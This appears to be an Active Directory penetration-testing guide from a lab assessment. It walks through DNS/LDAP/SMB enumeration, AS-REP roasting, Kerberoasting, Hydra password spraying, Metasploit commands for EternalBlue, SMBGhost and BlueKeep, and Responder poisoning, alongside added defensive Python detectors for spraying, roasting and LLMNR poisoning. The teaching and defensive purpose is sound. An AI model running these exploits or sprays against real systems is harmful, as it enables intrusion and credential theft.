1. Passive Reconnaissance (External Information Gathering)
This phase focuses on gathering as much information as possible about the Active Directory
environment without interacting directly with the domain.
a. DNS Enumeration
Active Directory relies heavily on DNS for service discovery. By querying DNS records, you
can gather important information about domain controllers, services, and more.
SRV Records: These records are used to locate domain controllers and other AD
services like LDAP, Kerberos, and the Global Catalog.
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain-name>
nslookup -type=SRV _kerberos._tcp.dc._msdcs.<domain-name>
Zone Transfers: Misconfigured DNS servers might allow you to request a zone
transfer and get a list of domain controllers, server names, and other domain-related
details.
nslookup
> set type=any
> ls -d <domain-name>
The DNS server refused to transfer the zone kkf.org to your computer.
DNS TXT Records: These can contain additional metadata about the domain. Some
domains may store useful details such as internal names, service records, and more.
nslookup -type=TXT <domain-name>
b. LDAP Enumeration
LDAP (port 389 by default) is the protocol used by Active Directory for querying and
managing the directory. Even if you're not part of the domain, you can sometimes query the
LDAP service anonymously.
Nmap LDAP Enumeration: Nmap has a script that can query LDAP for information
about users, groups, and other directory objects.
nmap -p 389 --script ldap-search 10.0.70.0/24
LDAPSearch: You can use ldapsearch (available on Linux and through
Cygwin/Windows) to perform an anonymous search on the LDAP directory.
# base DN is the domain naming context; the filter matches every object
ldapsearch -x -H ldap://10.0.70.22 -b "dc=kkf,dc=local" "(objectClass=*)"
If anonymous binding is allowed, this will give you a list of users, groups, and other
directory objects.
In this environment, secure configurations are applied and no anonymous binding is allowed.
c. SMB Enumeration
SMB (port 445) is commonly used in AD environments for file sharing, domain services, and
other network services. Enumerating SMB shares can give you valuable information.
Enum4Linux: This is a tool for enumerating SMB shares and users from Linux
systems.
enum4linux -a <target-IP>
Smbclient: You can also use smbclient to list shared folders and attempt to access
them anonymously.
smbclient -L //<target-IP> -U "" -N
Nmap SMB Enumeration: Use Nmap to check SMB version and details about
exposed services.
nmap -p 445 --script smb-os-discovery <target-IP>
d. Kerberos Enumeration
Kerberos (used by Active Directory for authentication) is often available to external attackers
even without domain membership. You can attempt to gather information on service accounts
and weaknesses in Kerberos configurations.
AS-REP Roasting: AS-REP roasting is the process of requesting authentication for
service accounts that don’t have pre-authentication enabled, which allows you to
capture the encrypted ticket and attempt to crack it offline.
python3 GetNPUsers.py <domain>/<user> -dc-ip <domain-controller> -request -outputfile asrep.txt
Impacket Kerberos Tools: Impacket provides tools that allow you to interact with
Kerberos. For example, GetUserSPNs.py can be used to extract service account
tickets that can be cracked offline.
python3 GetUserSPNs.py <domain>/<user> -dc-ip <domain-controller> -request
2. Active Reconnaissance (Direct Interactions with Services)
Once you have identified services and machines that may be of interest, you can probe them
more actively. This stage involves directly querying or interacting with services exposed
externally to extract more information or attempt exploitation.
a. Brute Forcing / Password Spraying
Password spraying involves trying a small number of common passwords against a large
number of accounts to avoid lockouts. This can be effective when testing for weak or reused
passwords.
Hydra for SMB: If SMB is exposed, you can brute-force logins using tools like
Hydra.
hydra -L userlist.txt -P passwordlist.txt smb://<target-IP>
Hydra for RDP: RDP (port 3389) can also be targeted with brute force if it’s
exposed.
hydra -t 4 -L userlist.txt -P passlist.txt rdp://<target-IP>
Password Spraying: Instead of brute-forcing multiple passwords on a single account,
password spraying uses a common password (e.g., Winter2023!) against many
accounts, which helps avoid triggering account lockouts.
hydra -L userlist.txt -p 'Winter2023!' smb://<target-IP>
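From the defender's side the two patterns described above look different in the domain controller's Security log: brute force hammers one account, while spraying touches many accounts once or twice each and stays under the lockout threshold. The following added example (not part of the original notes) classifies failed-logon (event 4625) records by source address; the record format and all values are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security event 4625 (failed logon) records, not real log data.
# Format: time|TargetUserName|IpAddress|Status  (0xC000006A = bad password, 0xC0000234 = locked out)
SAMPLE_4625 = [f"2024-03-01T09:00:{i:02d}|user{i:02d}|10.0.70.200|0xC000006A" for i in range(40)]
SAMPLE_4625 += [f"2024-03-01T09:05:{i:02d}|svc_backup|10.0.70.201|0xC000006A" for i in range(12)]
SAMPLE_4625 += ["2024-03-01T09:10:00|alice|10.0.70.50|0xC000006A",   # two typos from one user
                "2024-03-01T09:10:30|alice|10.0.70.50|0xC000006A"]

def parse_4625(line):
    """Split one constructed record into (timestamp, account, source ip, NTSTATUS)."""
    ts, user, ip, status = line.split("|")
    return datetime.fromisoformat(ts), user.lower(), ip, status

def classify_sources(lines, window=timedelta(minutes=10), spray_users=10, bruteforce_attempts=10):
    """Label each source IP by the shape of its failures inside one time window.

    spray       many distinct accounts, each tried fewer times than the lockout threshold
    bruteforce  one account tried at least `bruteforce_attempts` times
    benign      anything else (typos, a forgotten password)
    The window is anchored on the first failure seen from each source.
    """
    by_ip = defaultdict(list)
    for line in lines:
        ts, user, ip, status = parse_4625(line)
        if status in ("0xC000006A", "0xC0000234"):
            by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        start = events[0][0]
        per_user = Counter(user for ts, user in events if ts - start <= window)
        busiest = max(per_user.values())
        if busiest >= bruteforce_attempts:
            verdicts[ip] = "bruteforce"
        elif len(per_user) >= spray_users:
            verdicts[ip] = "spray"
        else:
            verdicts[ip] = "benign"
    return verdicts

if __name__ == "__main__":
    for ip, verdict in sorted(classify_sources(SAMPLE_4625).items()):
        print(f"{ip:<14} {verdict}")
```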
b. Exploiting SMB Vulnerabilities
Some older versions of SMB are vulnerable to remote code execution attacks, such as
EternalBlue (MS17-010). These vulnerabilities can be exploited without domain
membership if SMB is exposed.
EternalBlue Exploit (MS17-010): You can exploit SMB vulnerabilities using
Metasploit or standalone exploits.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target-IP>
run
SMBGhost (CVE-2020-0796): If the target is running a vulnerable, unpatched version of SMB,
SMBGhost can be used to gain access.
msfconsole
use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS <target-IP>
run
c. Exploiting RDP Vulnerabilities
RDP (Remote Desktop Protocol) can also be vulnerable to exploits, and some older versions
are susceptible to bugs that can allow attackers to execute code remotely.
BlueKeep (CVE-2019-0708): BlueKeep is a critical vulnerability in RDP that allows
unauthenticated remote code execution. You can exploit this via Metasploit.
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <target-IP>
run
3. Advanced Techniques Without Domain Membership
a. Kerberoasting
Kerberoasting is a method of attacking service accounts in Active Directory without needing
domain credentials. After requesting service tickets (TGS), you can attempt to crack them
offline.
Impacket's GetUserSPNs.py: This script will enumerate service principal names
(SPNs) from a domain controller. These are associated with service accounts, and if
the service accounts are weakly configured, you can extract and crack the tickets.
python3 GetUserSPNs.py <domain>/<user> -dc-ip <domain-controller> -request
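Both roasting techniques on this page (AS-REP roasting in section 1.d and Kerberoasting here) leave traces on the domain controller: GetNPUsers.py produces 4768 events with Pre-Authentication Type 0, and GetUserSPNs.py -request produces 4769 events whose ticket encryption is RC4 (0x17) for a user-account SPN. This added example (not from the original notes) triages constructed 4768/4769 records for those indicators; the sample values, including the 10.0.70.x addresses and KKF.LOCAL names, are made up to match this environment.

```python
from collections import defaultdict

RC4_HMAC = "0x17"   # Ticket Encryption Type for RC4-HMAC; 0x12 is AES256-CTS-HMAC-SHA1-96

# Constructed sample of Security events 4768 (TGT requested) and 4769 (service ticket requested).
# Field names follow the Windows event schema; the values are made up for this environment.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.70.200",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},                 # no pre-auth: roastable
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.70.50",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},                 # normal pre-authenticated logon
    {"EventID": 4769, "TargetUserName": "bob@KKF.LOCAL", "ServiceName": "svc_sql",
     "IpAddress": "::ffff:10.0.70.200", "TicketEncryptionType": "0x17"},  # RC4 TGS for a user SPN
    {"EventID": 4769, "TargetUserName": "bob@KKF.LOCAL", "ServiceName": "KKFSRV-DC3$",
     "IpAddress": "::ffff:10.0.70.50", "TicketEncryptionType": "0x12"},   # machine account, AES
    {"EventID": 4769, "TargetUserName": "bob@KKF.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.70.50", "TicketEncryptionType": "0x12"},   # TGT renewal, always present
]

def flag_asrep_roasting(event):
    """4768 with Pre-Authentication Type 0: the KDC issued an AS-REP without pre-auth,
    so its encrypted part can be cracked offline (this is what GetNPUsers.py collects)."""
    return event["EventID"] == 4768 and event["PreAuthType"] == "0"

def flag_kerberoasting(event):
    """4769 with an RC4 ticket for a service that is neither a machine account nor krbtgt:
    the TGS is encrypted with a human-chosen service password (what GetUserSPNs.py -request
    asks for). AES tickets for machine accounts are routine and are not flagged."""
    if event["EventID"] != 4769:
        return False
    svc = event["ServiceName"]
    return (not svc.endswith("$") and svc.lower() != "krbtgt"
            and event["TicketEncryptionType"].lower() == RC4_HMAC)

def triage(events):
    """Return {source_ip: {"asrep": [accounts], "kerberoast": [services]}} for sources
    that tripped at least one rule. In production, threshold on volume per source as well."""
    findings = defaultdict(lambda: {"asrep": [], "kerberoast": []})
    for ev in events:
        ip = ev["IpAddress"].replace("::ffff:", "")     # strip the IPv4-mapped prefix
        if flag_asrep_roasting(ev):
            findings[ip]["asrep"].append(ev["TargetUserName"])
        if flag_kerberoasting(ev):
            findings[ip]["kerberoast"].append(ev["ServiceName"])
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_EVENTS).items():
        print(ip, hits)
```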
b. Exploiting Service Accounts
Service accounts sometimes have weak passwords or are misconfigured, which makes them
prime targets. You can identify weak service accounts via Kerberos ticket enumeration or
SMB share enumeration.
c. Man-in-the-Middle Attacks
If you are within the network and can intercept traffic, you can use MITM techniques to
capture authentication tokens or hashes. Tools like Responder or Impacket can help with
poisoning NetBIOS or SMB traffic to capture hashes.
Responder: This tool can be used to poison network traffic and capture NTLMv1/v2
hashes.
responder -I <interface>
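Responder's LLMNR poisoning can be detected with a honeytoken query: ask the multicast group to resolve a name that cannot exist, and anything that answers is a poisoner. This added example (not part of the original notes) builds the LLMNR query and parses any answer using only the standard library; the multicast address 224.0.0.252 and port 5355 are the LLMNR defaults from RFC 4795, and the forged reply is a constructed test fixture, not captured traffic.

```python
import os
import socket
import struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 link-local multicast group and port

def build_llmnr_query(name, txn_id):
    """Encode an LLMNR A-record query; LLMNR reuses the DNS header and question format."""
    header = struct.pack("!HHHHHH", txn_id, 0, 1, 0, 0, 0)   # flags 0, QDCOUNT 1
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)   # QTYPE A, QCLASS IN

def _skip_name(pkt, pos):
    if pkt[pos] & 0xC0 == 0xC0:      # two-byte compression pointer
        return pos + 2
    while pkt[pos]:
        pos += pkt[pos] + 1
    return pos + 1

def parse_llmnr_answer(pkt, txn_id):
    """Return the IPv4 address a responder claims for our name, or None if pkt is no answer."""
    if len(pkt) < 12:
        return None
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if rid != txn_id or not flags & 0x8000 or an == 0:    # wrong id, not a response, no answers
        return None
    pos = 12
    for _ in range(qd):                                   # step over the echoed question(s)
        pos = _skip_name(pkt, pos) + 4
    pos = _skip_name(pkt, pos)                            # first answer record
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[pos:pos + 10])
    return socket.inet_ntoa(pkt[pos + 10:pos + 14]) if rtype == 1 and rdlen == 4 else None

def probe_for_poisoner(timeout=2.0):
    """Ask LLMNR for a random name that cannot exist; any reply identifies a poisoner."""
    name, txn_id = "honeypot-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_llmnr_query(name, txn_id), (LLMNR_GROUP, LLMNR_PORT))
        try:
            data, (src, _) = s.recvfrom(1024)
        except socket.timeout:
            return None
    claimed = parse_llmnr_answer(data, txn_id)
    return (src, claimed) if claimed else None

def sample_poisoned_reply(query, answer_ip):
    """Constructed test fixture: the reply a poisoner would send for `query` (not captured traffic)."""
    header = query[:2] + struct.pack("!HHHHH", 0x8000, 1, 1, 0, 0)   # QR set, one answer
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return header + query[12:] + answer
```

Run probe_for_poisoner() from a host on the segment being assessed; a result such as ('10.0.70.200', '10.0.70.200') means something answered for a name that cannot exist. The lasting fix is to turn off LLMNR (Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and NetBIOS over TCP/IP.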
d. DNS Spoofing or SMB Relay
If the internal network is misconfigured, you could attempt to redirect traffic using DNS
spoofing or relay SMB authentication attempts to capture hashes or credentials.
Conclusion